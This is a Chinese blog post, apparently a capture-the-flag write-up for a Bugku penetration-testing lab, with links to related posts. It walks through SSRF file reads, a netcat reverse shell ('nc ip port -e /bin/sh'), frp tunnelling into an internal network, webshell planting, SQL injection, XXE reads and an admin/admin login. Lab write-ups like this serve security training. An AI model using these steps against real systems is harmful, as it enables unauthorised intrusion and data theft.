bugku-渗透测试3

最新推荐文章于 2024-08-12 13:30:59 发布
最新推荐文章于 2024-08-12 13:30:59 发布
阅读量421 收藏 2
点赞数
分类专栏: 内网渗透项目 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ericalezl/article/details/131596157
版权
文章描述了一次网络安全测试的过程,通过SSRF漏洞读取内网信息,探测到192.168.0.10网站可能存在安全风险,执行命令反弹shell并利用FRP实现内网穿透。接着,通过SQL注入和XXE漏洞获取更多数据,并利用蚁剑进行远程控制。
摘要由CSDN通过智能技术生成

首先ssrf读取文件url=file:///flag ,拿到flag
探测内网主机
在这里插入图片描述1 2 10 138 250 的主机
在这里插入图片描述
读取/etc/hosts, /proc/net/arp, 拿到内网信息
扫描内网端口,提示192.168.0.10网站被黑,可能存有shell.php
在这里插入图片描述利用这个去执行命令反弹shell
测试可以出网
在这里插入图片描述测试命令发现对面不支持bash,可以用sh -c执行命令
在这里插入图片描述nc ip port -e /bin/sh 反弹成功
在这里插入图片描述将frp传到内网
vps开启服务./frps -c ./frps.ini,目标上执行./frpc -c ./frpc.ini
在这里插入图片描述proxifier配置代理,ip是公网服务器ip,端口是frpc.ini中的remote_port
在这里插入图片描述此时本地访问192.168.0.10/shell.php即可访问到目标内网的shell.php
在这里插入图片描述
在目标写入一句话,蚁剑连接
在这里插入图片描述192.168.0.138SQL注入
在这里插入图片描述192.168.0.250存在xxe,读取/flag和/var/www/html/flag
在这里插入图片描述在这里插入图片描述在192.168.0.10里还发发现10.10.0.22
在这里插入图片描述
访问10.10.0.22,加上admin.php,进入后台,输入admin、admin登录
在这里插入图片描述文件夹管理上传shell,点击拿到路径
在这里插入图片描述连接蚁剑
在这里插入图片描述拿到网站根目录和根目录下的两个flag
在这里插入图片描述
在这里插入图片描述

渗透漏洞 Bugku-Web4
weixin_52514668的博客
04-29 380
Bugku-Web4一. 开启环境,打开链接二. ctrl+u查看源代码三. 下载Hackbar组件四. 返回源代码页面,打开Hackbar五. 输入URL,传递post=what六. 得到flag 一. 开启环境,打开链接 二. ctrl+u查看源代码 查看源代码就会发现POST方式传递的——解决方法:下载Hackbar组件 三. 下载Hackbar组件 四. 返回源代码页面,打开Hackbar 五. 输入URL,传递post=what 六. 得到flag ...
渗透测试02
m0_63715896的博客
12-26 782
目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 如果想跟我一起讨论,那快加入我的知识星球吧!   渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布
BUGKU 渗透测试3
biejianghua的博客
05-23 879
bugku 渗透测试
Bugku CTF PAR渗透测试3write-up
afafsad的博客
02-23 1899
bugku CTF PAR 渗透测试3write-up
bugku 渗透靶场3
akxnxbshai的博客
04-01 1186
本题一共八个flag,主要是为了练习内网渗透的思路。
bugku渗透测试3-writeup
vsdfbhsdhsdfh的博客
07-09 621
三、后面的话我们判断一下bugku靶场的内网地址,一般都是192.168.0.0和192.168.1.0这两个地址范围,使用burp中的轰炸来对内网进行一个探测。二十二、登录192.168.0.250网站,发现admin,admin弱口令登录没反应,抓包判断是存在xxe漏洞。二、发现网站有ssrf,尝试读取一下etc/passwd文件,成功在根目录读取到了flag。二十三、直接使用xxe漏洞读取根目录下flag和网站根目录下的flag。二十一、在网站根目录下读取flag文件。十六、成功获取到了flag。
3种常见的渗透测试漏洞总结,快来收藏√
人生不怕起点低,就怕没追求
12-06 959
越权漏洞 越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广、危害大,被OWASP列为Web应用十大安全隐患的第二名。 所谓越权,顾名思义即超过当前用户的权力范围,越至不同用户或获得更高的系统权限的一类漏洞。 具体到应用当中,当服务器处理用户发起的请求时,没有对该用户的操作权限进行判定,从而导致不法分子利用该漏洞篡改用户信息,达到增删改查的目的。 该类漏洞在当前的测试中可通过Fiddler手工测试或Appscan自动扫描测试。越权漏洞一般可.
WEB安全渗透测试1-Msql基础
07-01
本课程主要为后续学习WEB安全提供铺垫,了解MYSQL技术的基本操作与查询方法,便于后续学习WEB安全的SQL注入的课程。本课主要讲解MYSQL数据库的建表,对数据表的增删改查以及where,group by ,order by,limit等查询...
bugku渗透测试2
08-28
在进行bugku渗透测试2时,可以按照以下步骤进行操作: 1. 首先,查看当前目录的文件,检查是否有任何可用的线索或文件。 2. 其次,进行全局搜索,寻找名为flag的文件。如果找到flag文件,通常会位于根目录下。查看...
渗透漏洞Bugku CTF-Web8
weixin_52514668的博客
04-30 469
Bugku CTF-Web8一.开启环境二. 分析代码,发现本地文件包含漏洞三. 获取flag 一.开启环境 二. 分析代码,发现本地文件包含漏洞 直接将flag.php文件读入变量hello中 访问 三. 获取flag
bugku 渗透测试
2202_75317918的博客
11-25 893
查看源代码。
Bugku测试版新题
Ronin_qianmo的博客
01-15 265
一、三分天下 1、打开题目附件,看到一个提示和另一个文本,下面一大串十六进制,好家伙,直接把这一大串的16进制导入进去010并且另存为后就看到是一张jpg图 2、活不多说直接binwalk或者foremost -T一波 3、打开一个txt,看到一句英文,flag有三部分,分别隐藏再三张图里面 4、接着先打开第一张图的那个rar 里面有一张jpg图,直接放进010查看,修改高度看一下 把01改为02,直接获得flag的一部分 5、打开第二个图片的压缩包,压缩包下面有一个注释,注释看起来像是一个字典,话不多说直
bugku题:web4、输入密码查看flag、点击一百万次
qq_43624349的博客
06-26 1249
web4 进入这道题发现有“看看源代码?”这个提示,然后我们就看看源代码 我们发现了一些URL编码和一些语句,虽然没有学过这些语句,但还是可以看出什么的,这很明显是p1后面的编码加上它下面第二行的那一小串编码,再加上p2后面的编码进行URL解码,解出来是这样的 这依旧没学过,不过中间出来了一串字符,我们用这串字符输入到题目下面的方框中,惊奇的发现flag出来了。 输入密码查看flag ...
BugKu -- PRA -- 渗透测试2
jiuyongpinyin的博客
04-16 1414
BugKu -- PRA -- 渗透测试2
Bugku CTF-Web篇writeup 3-11
anlr2020的博客
07-14 1321
Flask_FileUpload 由题目名得知的信息,显然是个文件上传的题目,flask:一种python的web框架 首先Ctrl+U查看页面源代码,一般能看到题目提示 支持jpg,png格式的文件上传,绿色的英文提示意思是上传文件,它会解析python代码并返回运行结果,所以上传php木马的并不能成功 在txt文档中写一段py程序来调用系统命令 导入 os模块 pyhon的os模块包含了普通的系统操作功能,这里os.system('')执行了ls命令 因为上传有格式的限制,所以要重命
bugku渗透测试 1 writeup(无需VPS)
没事我溜达
11-22 4212
BugKu该靶场只需要20金币就可以开启两小时,算的上非常良心实惠了,趁着有空赶紧刷一刷题目。
BugKu -- PRA -- 应急加固【简单】
jiuyongpinyin的博客
01-25 1806
BugKu -- PRA -- 应急加固【简单】
BugKu CTF Misc:linux & 富强民主 & 简单套娃 & split_all
最新发布
Flag少侠的博客
08-12 8882
BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统漏洞、密码学等,参与者需要通过解决这些漏洞来获取Flag。
bugku-渗透测试1通关 wp
qq_45414878的博客
10-13 5385
bugku 渗透测试1 靶场通关手册,祝你快速通关!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值